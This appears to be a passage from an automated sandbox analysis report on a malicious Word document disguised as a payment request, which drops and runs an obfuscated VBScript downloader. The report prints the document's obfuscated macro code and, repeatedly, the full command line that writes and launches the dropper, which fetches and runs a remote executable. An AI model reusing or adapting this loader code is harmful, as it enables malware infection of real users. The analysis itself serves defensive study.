Sqh7 = Sqh7 + 1
Case 4
Sqh7 = Sqh7 + Sqh7
Case Else
Sqh7 = Sqh7 - 1
End Select
End Function
Private Function VJr(ByVal VE As Variant) As Long
GWFXFdO = 53
Select Case GWFXFdO
Case 8
GWFXFdO = GWFXFdO + 1
Case 17
GWFXFdO = GWFXFdO + GWFXFdO
Case Else
GWFXFdO = GWFXFdO - 1
End Select
On Error GoTo Fs3h
AVkcfD = 55
Select Case AVkcfD
Case 89
AVkcfD = AVkcfD + 1
Case 13
AVkcfD = AVkcfD + AVkcfD
Case Else
AVkcfD = AVkcfD - 1
End Select
Dim TCON As Long, PkTVSNT As Variant
LotyF = 69
Select Case LotyF
Case 72
LotyF = LotyF + 1
Case 90
LotyF = LotyF + LotyF
Case Else
LotyF = LotyF - 1
End Select
Do
PkTVSNT = VE(TCON)
TCON = TCON + 1
Loop
IjuATy = 46
Select Case IjuATy
Case 56
IjuATy = IjuATy + 1
Case 71
IjuATy = IjuATy + IjuATy
Case Else
IjuATy = IjuATy - 1
End Select
Fs3h:
GP4ZE = 7
Select Case GP4ZE
Case 86
GP4ZE = GP4ZE + 1
Case 92
GP4ZE = GP4ZE + GP4ZE
Case Else
GP4ZE = GP4ZE - 1
End Select
If TCON = 0 Then Exit Function
Tkc = 77
Select Case Tkc
Case 59
Tkc = Tkc + 1
Case 41
Tkc = Tkc + Tkc
Case Else
Tkc = Tkc - 1
End Select
VJr = TCON - 1
Vi9W = 52
Select Case Vi9W
Case 60
Vi9W = Vi9W + 1
Case 11
Vi9W = Vi9W + Vi9W
Case Else
Vi9W = Vi9W - 1
End Select
End Function
Private Function KgTB0(ByVal Yl As String, ByVal S7I4 As Long, ByVal WiEtw As Variant) As String
Y8C = 96
Select Case Y8C
Case 15
Y8C = Y8C + 1
Case 60
Y8C = Y8C + Y8C
Case Else
Y8C = Y8C - 1
End Select
Dim Yfp() As Byte, MSM() As Byte, OYzyL As Long, N2 As Long
OySiI5x = 58
Select Case OySiI5x
Case 70
OySiI5x = OySiI5x + 1
Case 7
OySiI5x = OySiI5x + OySiI5x
Case Else
OySiI5x = OySiI5x - 1
End Select
Yfp = Yl
X3gIR = 76
Select Case X3gIR
Case 1
X3gIR = X3gIR + 1
Case 31
X3gIR = X3gIR + X3gIR
Case Else
X3gIR = X3gIR - 1
End Select
OYzyL = VJr(Yfp)
Xb = 56
Select Case Xb
Case 60
Xb = Xb + 1
Case 1
Xb = Xb + Xb
Case Else
Xb = Xb - 1
End Select
S7I4 = (S7I4 - 1) * 2
Xg = 61
Select Case Xg
Case 36
Xg = Xg + 1
Case 37
Xg = Xg + Xg
Case Else
Xg = Xg - 1
End Select
WiEtw = (WiEtw * 2) - 1
BU = 94
Select Case BU
Case 47
BU = BU + 1
Case 90
BU = BU + BU
Case Else
BU = BU - 1
End Select
If S7I4 + WiEtw > OYzyL Then WiEtw = OYzyL - S7I4
X2 = 74
Select Case X2
Case 62
X2 = X2 + 1
Case 97
X2 = X2 + X2
Case Else
X2 = X2 - 1
End Select
ReDim MSM(WiEtw)
RbNetFO = 42
Select Case RbNetFO
Case 70
RbNetFO = RbNetFO + 1
Case 85
RbNetFO = RbNetFO + RbNetFO
Case Else
RbNetFO = RbNetFO - 1
End Select
For N2 = S7I4 To S7I4 + WiEtw
MSM(N2 - S7I4) = Yfp(N2)
Next N2
NX9 = 86
Select Case NX9
Case 49
NX9 = NX9 + 1
Case 61
NX9 = NX9 + NX9
Case Else
NX9 = NX9 - 1
End Select
KgTB0 = MSM
DT14410 = 42
Select Case DT14410
Case 56
DT14410 = DT14410 + 1
Case 15
DT14410 = DT14410 + DT14410
Case Else
DT14410 = DT14410 - 1
End Select
End Function" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DF6A3690C371DBA0AE.TMP"
"WINWORD.EXE" created file "%TEMP%\4095702.cvr" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-60938"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-60938"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 6AF10000
- source
- Loaded Module
-
Runs shell commands
- details
-
"/V /C set "IMPWcMk=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM U2E" "FUNCtioN NIHd6n(Kg)" "W5b8=89" "NIHd6n=ChR(Kg)" "DxU=37" "End fuNCtiOn" "DPwSY=43" "XBEwSO" "Sub RosI()" "OtRiO=40" "DjlOG=""""" "JyE=87" "Wj4=U2E & C3p & DUskHmc("4C221940","Ebfl2")" "SmdN=44" "WPj=DUskHmc("365E345C372D56705D117560043300011372507277","RU3Pr")" "FB=31" "VgP5 U2E & DUskHmc("420E215B","CllX6")
Wj4" "F7jPi=92" "iF UDw="" thEn CdugF((2621-2617))" "BKOOmf=77" "IBPXJ="SsU2"" "Qq=62" "SEt LUJqkE=crEATEobjECT(DUskHmc("240651211A25467D203D573F1F",IBPXJ))" "V7bG=5" "LUJqkE.ruN WPj & Wj4 & DjlOG
3770-3770
633-633" "GImqM4=15" "enD sUb" "fUNcTIon Ie(L29,BL)" "L2wZa3b=19" "Ie=(L29 anD nOT BL)oR(nOt L29 AnD BL)" "TxNaVJa=74" "End FunctIOn" "FUnCtIon FFtQW(Mz)" "DVO=61" "FFtQW=AsC(Mz)" "YDL0p8=6" "enD fuNcTION" "Sub FKSr3C()" "LG=67" "Dim EJw
Ew" "For EJw = 13 To 5000698" "Ew = PQwAm + 87 + 55 + 76" "Next" "Wj2ic6J=80" "eNd Sub" "SUb JShIKc(Snydacp)" "GeOg=21" "diM Wteyix" "AHjuiRG=46" "IBeKg="C9Tpt"" "Gq=35" "sEt Wteyix=cReATeObJEct(DUskHmc("78103F300117070406265839",IBeKg))" "EBl=78" "Wteyix.oPeN" "GUCv8Bl2CvU=28" "Wteyix.TypE=6503-6502" "KG6qcEl=79" "Wteyix.WrIte Snydacp" "OSwJc=92" "Wteyix.SaVETofiLE U2E & DUskHmc("5D290A26","Ks")
525-523" "QYap1my=68" "Wteyix.cLosE" "LSo96q=5" "RosI" "KMxVr2A=15" "eND sUB" "FUncTIon VgP5(N6,McG)" "QPTYG9b=17" "Dim FQedSZg
EaTj
MQb
YZy
Ps(5)" "Y194piV=68" "Ps(0)=104" "FlQmMa=51" "Ps(4)=54" "Ar=27" "Ps(5)=52" "M4kS1P=22" "Ps(2)=107" "JWnXK=91" "Ps(1)=100" "JMvu=88" "Ps(3)=50" "ReBlfQR=91" "VBxI=71" "SeT FQedSZg=CREateobjecT(DUskHmc("1A56391F203D5C25117E0F5C27130330463F133D06572113333D", "PI5Kv"))" "BZIwDh=66" "SEt EaTj=FQedSZg.GETFilE(N6)" "GssO=4" "SeT YZy=EaTj.oPeNASTExTStreAM(4529-4528,7652-7652)" "SWATE=19" "Set MQb=FQedSZg.CreatEtEXTfIle(McG,6945-6944,2887-2887)" "AfPN=48" "dO UnTiL YZy.AtenDofStREAM" "MQb.WrITE NIHd6n(Ie(FFtQW(YZy.rEAD(9788-9787))
Ps(0)))" "lOOP" "NWwLO0Y=78" "MQb.CLOSe" "AhAjIC=25" "YZy.cLOsE" "Sc=82" "ENd FUNCTIoN" "SuB XBEwSO()" "Yv=53" "Moz=98934287" "LKhw=79" "fOR FbW=1 To Moz" "Ah9n4=Ah9n4+1" "NEXt" "UDCD=18" "If Ah9n4=Moz thEN" "Xfmx=28" "CdugF((18832/4708))" "WFpl=80" "Bts6(DUskHmc("042405486A764320104C3129003F045E7E3A033D5E5C312D0D7E13513E","YlPq8P"))" "MAqx=4" "eNd iF" "By=45" "ENd SuB" "FUNcTioN C3p()" "MKUg=40" "C3p=sECoND(tiME)" "IcqXbS=21" "End FUNctIOn" "FUNCtIOn DUskHmc(SN3,WnmJT9)" "BVFAQ=80" "diM Mi7
C0
SBK" "Ctva=56" "foR Mi7=1 To (LeN(SN3)/2)" "C0=(NIHd6n((6341-6303)) & NIHd6n((-3454+3526))&(MId(SN3,(Mi7+Mi7)-1
2)))" "SBK=(FFtQW(Mid(WnmJT9,((Mi7 moD Len(WnmJT9))+1)
1)))" "DUskHmc=DUskHmc+NIHd6n(Ie(C0,SBK))" "nExT" "ItpbRaa=4" "eND FunCTiOn" "SUb CdugF(YZfaQ)" "MW8fQk=19" "DiM LKgz" "RQU91=43" "LKgz=tiMeR+YZfaQ" "Do wHilE TiMer<LKgz" "LOOp" "ALr6vt7=10" "EnD suB" "suB YjdX()" "D2=51" "dIm N0S
YR3Zi" "BXZQPVv=15" "Do whILE N0S<>2924-2923" "YR3Zi=YR3Zi+1" "lOOp" "McE72Y=1" "eNd SuB" "FunCTIon Bts6(QQCtSoh)" "NEAPx=19" "diM ISw4hb
Ur" "V9ev=73" "EgKO="Wj"" "MGN=2" "On ErRor resUme nExt" "RHSGp=70" "S0L="Ki"" "BHaPLD=77" "sET ISw4hb=CreaTeobjecT(DUskHmc("3E180A39003B1D653A230C2705",S0L))" "PcLJK=69" "OkiIp="Ks"" "FKSr3C" "RT5=6" "Set Dj=ISw4hb.EnViRoNMent(DUskHmc("35281C15021F36","LezSVG"))" "OK5SlJB=59" "U2E=Dj(DUskHmc("2B2A170C333D16","WjzGHri"))&NIHd6n((-383+475))& C3p & C3p" "XPzv=84" "V9fqN="IT"" "VNhUU=34" "sEt Ur=creATeobjECt(DUskHmc("1920373B3B3A3B2F20670C041801001D04",V9fqN))" "SU6=49" "Ur.oPen DUskHmc("7F0436","K8AbB")
QQCtSoh
2084-2084" "Fk=12" "Ur.sEnD()" "JcwrO2=72" "if Ur.StATus=(779-579) then" "JW4C9E=56" "FKSr3C" "XTMuLm=15" "CdugF((8748-8744))" "SJG9Gl=47" "JShIKc Ur.REsPONseBoDY" "ULYa=19" "Else" "ImVGu=56" "LE="XT1qx2y"" "UNe394=87" "SEt Ur= CReatEoBject(DUskHmc("1958120A5D0A3732455F207F3510006521",LE))" "WJPwKs=61" "Ur.opeN DUskHmc("750666","C2")
DUskHmc("27464632681C617D02056C670460771C0077631C2A2E46536C305A20","NO22BR3" )
118-118" "J6BhGq=71" "Ur.Send()" "Cr=26" "If Ur.sTAtUs=(-9447+9647)Then JShIKc Ur.reSPonsEBOdY" "OGHTLr=13" "WRGjPN=93" "end if" "VJtV=92" "End FUNctiOn") do @echo %~i)>"!IMPWcMk!" && start "" "!IMPWcMk!"" on 2016-8-8.19:29:00.931 - source
- Monitored Target
- relevance
- 5/10
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "/V /C set "IMPWcMk=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM U2E" "FUNCtioN NIHd6n(Kg)" "W5b8=89" "NIHd6n=ChR(Kg)" "DxU=37" "End fuNCtiOn" "DPwSY=43" "XBEwSO" "Sub RosI()" "OtRiO=40" "DjlOG=""""" "JyE=87" "Wj4=U2E & C3p & DUskHmc("4C221940","Ebfl2")" "SmdN=44" "WPj=DUskHmc("365E345C372D56705D117560043300011372507277","RU3Pr")" "FB=31" "VgP5 U2E & DUskHmc("420E215B","CllX6")
Wj4" "F7jPi=92" "iF UDw="" thEn CdugF((2621-2617))" "BKOOmf=77" "IBPXJ="SsU2"" "Qq=62" "SEt LUJqkE=crEATEobjECT(DUskHmc("240651211A25467D203D573F1F",IBPXJ))" "V7bG=5" "LUJqkE.ruN WPj & Wj4 & DjlOG
3770-3770
633-633" "GImqM4=15" "enD sUb" "fUNcTIon Ie(L29,BL)" "L2wZa3b=19" "Ie=(L29 anD nOT BL)oR(nOt L29 AnD BL)" "TxNaVJa=74" "End FunctIOn" "FUnCtIon FFtQW(Mz)" "DVO=61" "FFtQW=AsC(Mz)" "YDL0p8=6" "enD fuNcTION" "Sub FKSr3C()" "LG=67" "Dim EJw
Ew" "For EJw = 13 To 5000698" "Ew = PQwAm + 87 + 55 + 76" "Next" "Wj2ic6J=80" "eNd Sub" "SUb JShIKc(Snydacp)" "GeOg=21" "diM Wteyix" "AHjuiRG=46" "IBeKg="C9Tpt"" "Gq=35" "sEt Wteyix=cReATeObJEct(DUskHmc("78103F300117070406265839",IBeKg))" "EBl=78" "Wteyix.oPeN" "GUCv8Bl2CvU=28" "Wteyix.TypE=6503-6502" "KG6qcEl=79" "Wteyix.WrIte Snydacp" "OSwJc=92" "Wteyix.SaVETofiLE U2E & DUskHmc("5D290A26","Ks")
525-523" "QYap1my=68" "Wteyix.cLosE" "LSo96q=5" "RosI" "KMxVr2A=15" "eND sUB" "FUncTIon VgP5(N6,McG)" "QPTYG9b=17" "Dim FQedSZg
EaTj
MQb
YZy
Ps(5)" "Y194piV=68" "Ps(0)=104" "FlQmMa=51" "Ps(4)=54" "Ar=27" "Ps(5)=52" "M4kS1P=22" "Ps(2)=107" "JWnXK=91" "Ps(1)=100" "JMvu=88" "Ps(3)=50" "ReBlfQR=91" "VBxI=71" "SeT FQedSZg=CREateobjecT(DUskHmc("1A56391F203D5C25117E0F5C27130330463F133D06572113333D", "PI5Kv"))" "BZIwDh=66" "SEt EaTj=FQedSZg.GETFilE(N6)" "GssO=4" "SeT YZy=EaTj.oPeNASTExTStreAM(4529-4528,7652-7652)" "SWATE=19" "Set MQb=FQedSZg.CreatEtEXTfIle(McG,6945-6944,2887-2887)" "AfPN=48" "dO UnTiL YZy.AtenDofStREAM" "MQb.WrITE NIHd6n(Ie(FFtQW(YZy.rEAD(9788-9787))
Ps(0)))" "lOOP" "NWwLO0Y=78" "MQb.CLOSe" "AhAjIC=25" "YZy.cLOsE" "Sc=82" "ENd FUNCTIoN" "SuB XBEwSO()" "Yv=53" "Moz=98934287" "LKhw=79" "fOR FbW=1 To Moz" "Ah9n4=Ah9n4+1" "NEXt" "UDCD=18" "If Ah9n4=Moz thEN" "Xfmx=28" "CdugF((18832/4708))" "WFpl=80" "Bts6(DUskHmc("042405486A764320104C3129003F045E7E3A033D5E5C312D0D7E13513E","YlPq8P"))" "MAqx=4" "eNd iF" "By=45" "ENd SuB" "FUNcTioN C3p()" "MKUg=40" "C3p=sECoND(tiME)" "IcqXbS=21" "End FUNctIOn" "FUNCtIOn DUskHmc(SN3,WnmJT9)" "BVFAQ=80" "diM Mi7
C0
SBK" "Ctva=56" "foR Mi7=1 To (LeN(SN3)/2)" "C0=(NIHd6n((6341-6303)) & NIHd6n((-3454+3526))&(MId(SN3,(Mi7+Mi7)-1
2)))" "SBK=(FFtQW(Mid(WnmJT9,((Mi7 moD Len(WnmJT9))+1)
1)))" "DUskHmc=DUskHmc+NIHd6n(Ie(C0,SBK))" "nExT" "ItpbRaa=4" "eND FunCTiOn" "SUb CdugF(YZfaQ)" "MW8fQk=19" "DiM LKgz" "RQU91=43" "LKgz=tiMeR+YZfaQ" "Do wHilE TiMer<LKgz" "LOOp" "ALr6vt7=10" "EnD suB" "suB YjdX()" "D2=51" "dIm N0S
YR3Zi" "BXZQPVv=15" "Do whILE N0S<>2924-2923" "YR3Zi=YR3Zi+1" "lOOp" "McE72Y=1" "eNd SuB" "FunCTIon Bts6(QQCtSoh)" "NEAPx=19" "diM ISw4hb
Ur" "V9ev=73" "EgKO="Wj"" "MGN=2" "On ErRor resUme nExt" "RHSGp=70" "S0L="Ki"" "BHaPLD=77" "sET ISw4hb=CreaTeobjecT(DUskHmc("3E180A39003B1D653A230C2705",S0L))" "PcLJK=69" "OkiIp="Ks"" "FKSr3C" "RT5=6" "Set Dj=ISw4hb.EnViRoNMent(DUskHmc("35281C15021F36","LezSVG"))" "OK5SlJB=59" "U2E=Dj(DUskHmc("2B2A170C333D16","WjzGHri"))&NIHd6n((-383+475))& C3p & C3p" "XPzv=84" "V9fqN="IT"" "VNhUU=34" "sEt Ur=creATeobjECt(DUskHmc("1920373B3B3A3B2F20670C041801001D04",V9fqN))" "SU6=49" "Ur.oPen DUskHmc("7F0436","K8AbB")
QQCtSoh
2084-2084" "Fk=12" "Ur.sEnD()" "JcwrO2=72" "if Ur.StATus=(779-579) then" "JW4C9E=56" "FKSr3C" "XTMuLm=15" "CdugF((8748-8744))" "SJG9Gl=47" "JShIKc Ur.REsPONseBoDY" "ULYa=19" "Else" "ImVGu=56" "LE="XT1qx2y"" "UNe394=87" "SEt Ur= CReatEoBject(DUskHmc("1958120A5D0A3732455F207F3510006521",LE))" "WJPwKs=61" "Ur.opeN DUskHmc("750666","C2")
DUskHmc("27464632681C617D02056C670460771C0077631C2A2E46536C305A20","NO22BR3" )
118-118" "J6BhGq=71" "Ur.Send()" "Cr=26" "If Ur.sTAtUs=(-9447+9647)Then JShIKc Ur.reSPonsEBOdY" "OGHTLr=13" "WRGjPN=93" "end if" "VJtV=92" "End FUNctiOn") do @echo %~i)>"!IMPWcMk!" && start "" "!IMPWcMk!"" (Show Process)
Spawned process "wscript.exe" with commandline ""%APPDATA%\12537.vbs"" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"~WRS{C4CA1DDF-3C5B-44E9-878C-FFA674DC61EC}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"~WRS{7DC8356D-B306-4181-BE3E-1866D9CE1957}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"eddb68e509259ca752949a523261e941d09db30f23d9a5b787e4920e364b57b2.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Hidden Archive ctime=Tue Aug 9 01:55:30 2016 mtime=Tue Aug 9 01:55:30 2016 atime=Tue Aug 9 01:55:22 2016 length=229888 window=hide"
"index.dat" has type "data"
"data[1].bin" has type "data"
"ExcludeDictionaryEN0409.lex" has type "Little-endian UTF-16 Unicode text with no line terminators"
"00.bym" has type "data"
"12537.vbs" has type "ASCII text with CRLF line terminators"
"000.Dur" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"~WRS{BB503958-3802-44FF-AB19-EA86B3B10994}.tmp" has type "data"
"~$db68e509259ca752949a523261e941d09db30f23d9a5b787e4920e364b57b2.doc" has type "data"
"4095702.cvr" has type "data"
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://www.iec.ch"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://www.iec.chIEC"
Heuristic match: "pataplouf.com" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
File Details
Vestibulum Neque Sed Corporation_%request for a paymentf61p-73h_%q15ij97x.rtf
- Filename
- Vestibulum Neque Sed Corporation_%request for a paymentf61p-73h_%q15ij97x.rtf
- Size
- 225KiB (229888 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: mornless , Template: Normal.dotm, Last Saved By: calomels , Revision Number: 4, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jun 3 22:27:00 2016, Last Saved Time/Date: Sat Aug 6 21:43:00 2016, Number of Pages: 1, Number of Words: 9713, Number of Characters: 55369, Security: 0
- Architecture
- WINDOWS
- SHA256
- eddb68e509259ca752949a523261e941d09db30f23d9a5b787e4920e364b57b2
- MD5
- bec6f3fea09d401f3a5e0be812659df0
- SHA1
- 7c9ba839ad11555660d165b9df101617f4e3631f
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 3 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\eddb68e509259ca752949a523261e941d09db30f23d9a5b787e4920e364b57b2.doc"
(PID: 3524)
-
cmd.exe
/V /C set "IMPWcMk=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM U2E" "FUNCtioN NIHd6n(Kg)" "W5b8=89" "NIHd6n=ChR(Kg)" "DxU=37" "End fuNCtiOn" "DPwSY=43" "XBEwSO" "Sub RosI()" "OtRiO=40" "DjlOG=""""" "JyE=87" "Wj4=U2E & C3p & DUskHmc("4C221940","Ebfl2")" "SmdN=44" "WPj=DUskHmc("365E345C372D56705D117560043300011372507277","RU3Pr")" "FB=31" "VgP5 U2E & DUskHmc("420E215B","CllX6"),Wj4" "F7jPi=92" "iF UDw="" thEn CdugF((2621-2617))" "BKOOmf=77" "IBPXJ="SsU2"" "Qq=62" "SEt LUJqkE=crEATEobjECT(DUskHmc("240651211A25467D203D573F1F",IBPXJ))" "V7bG=5" "LUJqkE.ruN WPj & Wj4 & DjlOG,3770-3770,633-633" "GImqM4=15" "enD sUb" "fUNcTIon Ie(L29,BL)" "L2wZa3b=19" "Ie=(L29 anD nOT BL)oR(nOt L29 AnD BL)" "TxNaVJa=74" "End FunctIOn" "FUnCtIon FFtQW(Mz)" "DVO=61" "FFtQW=AsC(Mz)" "YDL0p8=6" "enD fuNcTION" "Sub FKSr3C()" "LG=67" "Dim EJw, Ew" "For EJw = 13 To 5000698" "Ew = PQwAm + 87 + 55 + 76" "Next" "Wj2ic6J=80" "eNd Sub" "SUb JShIKc(Snydacp)" "GeOg=21" "diM Wteyix" "AHjuiRG=46" "IBeKg="C9Tpt"" "Gq=35" "sEt Wteyix=cReATeObJEct(DUskHmc("78103F300117070406265839",IBeKg))" "EBl=78" "Wteyix.oPeN" "GUCv8Bl2CvU=28" "Wteyix.TypE=6503-6502" "KG6qcEl=79" "Wteyix.WrIte Snydacp" "OSwJc=92" "Wteyix.SaVETofiLE U2E & DUskHmc("5D290A26","Ks"),525-523" "QYap1my=68" "Wteyix.cLosE" "LSo96q=5" "RosI" "KMxVr2A=15" "eND sUB" "FUncTIon VgP5(N6,McG)" "QPTYG9b=17" "Dim FQedSZg,EaTj,MQb,YZy,Ps(5)" "Y194piV=68" "Ps(0)=104" "FlQmMa=51" "Ps(4)=54" "Ar=27" "Ps(5)=52" "M4kS1P=22" "Ps(2)=107" "JWnXK=91" "Ps(1)=100" "JMvu=88" "Ps(3)=50" "ReBlfQR=91" "VBxI=71" "SeT FQedSZg=CREateobjecT(DUskHmc("1A56391F203D5C25117E0F5C27130330463F133D06572113333D", "PI5Kv"))" "BZIwDh=66" "SEt EaTj=FQedSZg.GETFilE(N6)" "GssO=4" "SeT YZy=EaTj.oPeNASTExTStreAM(4529-4528,7652-7652)" "SWATE=19" "Set MQb=FQedSZg.CreatEtEXTfIle(McG,6945-6944,2887-2887)" "AfPN=48" "dO UnTiL YZy.AtenDofStREAM" "MQb.WrITE NIHd6n(Ie(FFtQW(YZy.rEAD(9788-9787)),Ps(0)))" "lOOP" "NWwLO0Y=78" "MQb.CLOSe" "AhAjIC=25" "YZy.cLOsE" "Sc=82" "ENd FUNCTIoN" "SuB XBEwSO()" "Yv=53" "Moz=98934287" "LKhw=79" "fOR FbW=1 To Moz" "Ah9n4=Ah9n4+1" "NEXt" "UDCD=18" "If Ah9n4=Moz thEN" "Xfmx=28" "CdugF((18832/4708))" "WFpl=80" "Bts6(DUskHmc("042405486A764320104C3129003F045E7E3A033D5E5C312D0D7E13513E","YlPq8P"))" "MAqx=4" "eNd iF" "By=45" "ENd SuB" "FUNcTioN C3p()" "MKUg=40" "C3p=sECoND(tiME)" "IcqXbS=21" "End FUNctIOn" "FUNCtIOn DUskHmc(SN3,WnmJT9)" "BVFAQ=80" "diM Mi7,C0,SBK" "Ctva=56" "foR Mi7=1 To (LeN(SN3)/2)" "C0=(NIHd6n((6341-6303)) & NIHd6n((-3454+3526))&(MId(SN3,(Mi7+Mi7)-1,2)))" "SBK=(FFtQW(Mid(WnmJT9,((Mi7 moD Len(WnmJT9))+1),1)))" "DUskHmc=DUskHmc+NIHd6n(Ie(C0,SBK))" "nExT" "ItpbRaa=4" "eND FunCTiOn" "SUb CdugF(YZfaQ)" "MW8fQk=19" "DiM LKgz" "RQU91=43" "LKgz=tiMeR+YZfaQ" "Do wHilE TiMer<LKgz" "LOOp" "ALr6vt7=10" "EnD suB" "suB YjdX()" "D2=51" "dIm N0S,YR3Zi" "BXZQPVv=15" "Do whILE N0S<>2924-2923" "YR3Zi=YR3Zi+1" "lOOp" "McE72Y=1" "eNd SuB" "FunCTIon Bts6(QQCtSoh)" "NEAPx=19" "diM ISw4hb,Ur" "V9ev=73" "EgKO="Wj"" "MGN=2" "On ErRor resUme nExt" "RHSGp=70" "S0L="Ki"" "BHaPLD=77" "sET ISw4hb=CreaTeobjecT(DUskHmc("3E180A39003B1D653A230C2705",S0L))" "PcLJK=69" "OkiIp="Ks"" "FKSr3C" "RT5=6" "Set Dj=ISw4hb.EnViRoNMent(DUskHmc("35281C15021F36","LezSVG"))" "OK5SlJB=59" "U2E=Dj(DUskHmc("2B2A170C333D16","WjzGHri"))&NIHd6n((-383+475))& C3p & C3p" "XPzv=84" "V9fqN="IT"" "VNhUU=34" "sEt Ur=creATeobjECt(DUskHmc("1920373B3B3A3B2F20670C041801001D04",V9fqN))" "SU6=49" "Ur.oPen DUskHmc("7F0436","K8AbB"),QQCtSoh,2084-2084" "Fk=12" "Ur.sEnD()" "JcwrO2=72" "if Ur.StATus=(779-579) then" "JW4C9E=56" "FKSr3C" "XTMuLm=15" "CdugF((8748-8744))" "SJG9Gl=47" "JShIKc Ur.REsPONseBoDY" "ULYa=19" "Else" "ImVGu=56" "LE="XT1qx2y"" "UNe394=87" "SEt Ur= CReatEoBject(DUskHmc("1958120A5D0A3732455F207F3510006521",LE))" "WJPwKs=61" "Ur.opeN DUskHmc("750666","C2"),DUskHmc("27464632681C617D02056C670460771C0077631C2A2E46536C305A20","NO22BR3" ),118-118" "J6BhGq=71" "Ur.Send()" "Cr=26" "If Ur.sTAtUs=(-9447+9647)Then JShIKc Ur.reSPonsEBOdY" "OGHTLr=13" "WRGjPN=93" "end if" "VJtV=92" "End FUNctiOn") do @echo %~i)>"!IMPWcMk!" && start "" "!IMPWcMk!"
(PID: 3128)
- wscript.exe "%APPDATA%\12537.vbs" (PID: 2720)
-
cmd.exe
/V /C set "IMPWcMk=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM U2E" "FUNCtioN NIHd6n(Kg)" "W5b8=89" "NIHd6n=ChR(Kg)" "DxU=37" "End fuNCtiOn" "DPwSY=43" "XBEwSO" "Sub RosI()" "OtRiO=40" "DjlOG=""""" "JyE=87" "Wj4=U2E & C3p & DUskHmc("4C221940","Ebfl2")" "SmdN=44" "WPj=DUskHmc("365E345C372D56705D117560043300011372507277","RU3Pr")" "FB=31" "VgP5 U2E & DUskHmc("420E215B","CllX6"),Wj4" "F7jPi=92" "iF UDw="" thEn CdugF((2621-2617))" "BKOOmf=77" "IBPXJ="SsU2"" "Qq=62" "SEt LUJqkE=crEATEobjECT(DUskHmc("240651211A25467D203D573F1F",IBPXJ))" "V7bG=5" "LUJqkE.ruN WPj & Wj4 & DjlOG,3770-3770,633-633" "GImqM4=15" "enD sUb" "fUNcTIon Ie(L29,BL)" "L2wZa3b=19" "Ie=(L29 anD nOT BL)oR(nOt L29 AnD BL)" "TxNaVJa=74" "End FunctIOn" "FUnCtIon FFtQW(Mz)" "DVO=61" "FFtQW=AsC(Mz)" "YDL0p8=6" "enD fuNcTION" "Sub FKSr3C()" "LG=67" "Dim EJw, Ew" "For EJw = 13 To 5000698" "Ew = PQwAm + 87 + 55 + 76" "Next" "Wj2ic6J=80" "eNd Sub" "SUb JShIKc(Snydacp)" "GeOg=21" "diM Wteyix" "AHjuiRG=46" "IBeKg="C9Tpt"" "Gq=35" "sEt Wteyix=cReATeObJEct(DUskHmc("78103F300117070406265839",IBeKg))" "EBl=78" "Wteyix.oPeN" "GUCv8Bl2CvU=28" "Wteyix.TypE=6503-6502" "KG6qcEl=79" "Wteyix.WrIte Snydacp" "OSwJc=92" "Wteyix.SaVETofiLE U2E & DUskHmc("5D290A26","Ks"),525-523" "QYap1my=68" "Wteyix.cLosE" "LSo96q=5" "RosI" "KMxVr2A=15" "eND sUB" "FUncTIon VgP5(N6,McG)" "QPTYG9b=17" "Dim FQedSZg,EaTj,MQb,YZy,Ps(5)" "Y194piV=68" "Ps(0)=104" "FlQmMa=51" "Ps(4)=54" "Ar=27" "Ps(5)=52" "M4kS1P=22" "Ps(2)=107" "JWnXK=91" "Ps(1)=100" "JMvu=88" "Ps(3)=50" "ReBlfQR=91" "VBxI=71" "SeT FQedSZg=CREateobjecT(DUskHmc("1A56391F203D5C25117E0F5C27130330463F133D06572113333D", "PI5Kv"))" "BZIwDh=66" "SEt EaTj=FQedSZg.GETFilE(N6)" "GssO=4" "SeT YZy=EaTj.oPeNASTExTStreAM(4529-4528,7652-7652)" "SWATE=19" "Set MQb=FQedSZg.CreatEtEXTfIle(McG,6945-6944,2887-2887)" "AfPN=48" "dO UnTiL YZy.AtenDofStREAM" "MQb.WrITE 